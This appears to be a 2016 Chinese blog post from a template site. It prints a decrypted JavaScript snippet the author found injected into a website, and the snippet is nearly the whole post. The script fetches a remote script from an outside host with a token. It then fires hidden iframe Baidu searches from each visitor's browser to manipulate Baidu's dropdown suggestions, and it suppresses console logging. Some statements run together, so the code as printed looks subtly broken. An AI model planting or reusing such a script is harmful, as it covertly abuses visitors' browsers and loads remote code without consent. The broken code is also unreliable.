百度刷下拉关键代码分享

模板网 2016-08-17

近日在分析一个网站的时候,看到网站中加了一段加密的代码,遂产生了兴趣,刚好下午没事,就研究这个对其进行解密,最终得到如下代码。

大概的看了一下代码,发现其尽然是刷百度下拉的代码,特分享出来与大家一同学习一下。

复制代码 代码如下:
(function() {
    if (checkCookie() != true) {
        var url = "http://baiduword.ars.systems/experience?uid=175&token=d6c418376de4e70698e793bdd764c0&callback=dropdown";
        var script = document.createElement('script');
        script.setAttribute('src', url);
        document.getElementsByTagName('head')[0].appendChild(script);
    }
})();
 
function getCookie(dp) {
    if (document.cookie.length > 0) {
        c_start = document.cookie.indexOf(dp + "=") if (c_start != -1) {
            return true;
        }
    }
    return;
}
 
function setCookie(c_name, value, expiredays) {
    var exdate = new Date() exdate.setDate(exdate.getDate() + expiredays) document.cookie = c_name + "=" + escape(value) + ((expiredays == null) ? "": ";expires=" + exdate.toGMTString())
}
 
function checkCookie() {
    dpCookie = getCookie('dpLastVisit') if (dpCookie == null || dpCookie == "") {
        setCookie('dpLastVisit', new Date())
    } else {
        return true;
    }
}
 
function dropdown(data) {
    for (var i = 0; i < data.length; i++) {
        putDropdown(encodeURI(data[i]['keyword']));
    }
};
 
function putDropdown(keyword) {
    var url = "http://www.baidu.com/s?wd=" + keyword;
    var iframeid = document.createElement('iframe');
    iframeid.src = url;
    iframeid.style.display = 'none';
    document.body.appendChild(iframeid);
    if (iframeid.attachEvent) {
        iframeid.attachEvent("onload",
        function() {
            document.body.removeChild(iframeid);
        });
    } else {
        iframeid.onload = function() {
            document.body.removeChild(iframeid);
        };
    }
};
window.onerror,
console.log = function() {
    return false
};
 

 

相关文章

  1. 常用DNS服务器IP地址

    公共 DNS 服务器 IP 地址 名称 DNS 服务器 IP 地址 阿里 AliDNS 223.5.5.5 223.6.6.6 CNNIC SDNS 1.2.4.8 210.2.4.8 114 DNS 114.114.114.114 114.114.115.115 oneDNS 112.124.47.27 114.215.126.16 DNS 派 电信/移动/铁通 101.226.4.6 218.30.118.6 DNS 派

  2. 百度刷下拉关键代码分享

    近日在分析一个网站的时候,看到网站中加了一段加密的代码,遂产生了兴趣,刚好下午没事,就研究这个对其进行解密,最终得到如下代码。 大概的看了一下代码,发现其尽然是刷百度下拉的代码,特分享出来与大家一同学习一下。 复制代码 代码如下: (function()

  3. 破解网站文章无法复制

    看到别人的网站上有一篇文章写的非常好,想借过来用用,于是按照老办法抄起我的鼠标选择文本复制粘贴,ca,不管用,Ctrl+A,Ctrl+C,也不管用,额,被人家限制复制了,咋办?总不能照着打一遍吧,下面医疗模板库(www.120muban.com)为大家介绍一个破解这种限制

  4. Flash始终位于最上层的解决方法(让FLASH对象位于DIV层之下)

    很多时候,我们在页面插入FLASH的时候会发现,flash是object,然后页面默认把它始终是放在最上面的,这样flash上面紧贴着的下拉菜单便到后面看不到了。设置层也没有用。 这 样在生成页面的时候就变得很被动,于是我做了个浮动层,原来的页面上有flash,但是

  5. 如何巧用.htaccess设置网站的压缩与缓存

    如何采用.htaccess设置网站的压缩与缓存 在网站根目录下的.htaccess文件中添加以下代码 复制代码 代码如下: IfModule mod_expires.c ExpiresActive On ExpiresByType image/gif A2592000 ExpiresByType image/jpeg A2592000 ExpiresByType image/png A259200

随机推荐

  1. 常用DNS服务器IP地址

    公共 DNS 服务器 IP 地址 名称 DNS 服务器 IP 地址 阿里 AliDNS 223.5.5.5 223.6.6.6 CNNIC SDNS 1.2.4.8 210.2.4.8 114 DNS 114.114.114.114 114.114.115.115 oneDNS 112.124.47.27 114.215.126.16 DNS 派 电信/移动/铁通 101.226.4.6 218.30.118.6 DNS 派

  2. 百度刷下拉关键代码分享

    近日在分析一个网站的时候,看到网站中加了一段加密的代码,遂产生了兴趣,刚好下午没事,就研究这个对其进行解密,最终得到如下代码。 大概的看了一下代码,发现其尽然是刷百度下拉的代码,特分享出来与大家一同学习一下。 复制代码 代码如下: (function()

  3. 破解网站文章无法复制

    看到别人的网站上有一篇文章写的非常好,想借过来用用,于是按照老办法抄起我的鼠标选择文本复制粘贴,ca,不管用,Ctrl+A,Ctrl+C,也不管用,额,被人家限制复制了,咋办?总不能照着打一遍吧,下面医疗模板库(www.120muban.com)为大家介绍一个破解这种限制

  4. Flash始终位于最上层的解决方法(让FLASH对象位于DIV层之下)

    很多时候,我们在页面插入FLASH的时候会发现,flash是object,然后页面默认把它始终是放在最上面的,这样flash上面紧贴着的下拉菜单便到后面看不到了。设置层也没有用。 这 样在生成页面的时候就变得很被动,于是我做了个浮动层,原来的页面上有flash,但是

  5. 如何巧用.htaccess设置网站的压缩与缓存

    如何采用.htaccess设置网站的压缩与缓存 在网站根目录下的.htaccess文件中添加以下代码 复制代码 代码如下: IfModule mod_expires.c ExpiresActive On ExpiresByType image/gif A2592000 ExpiresByType image/jpeg A2592000 ExpiresByType image/png A259200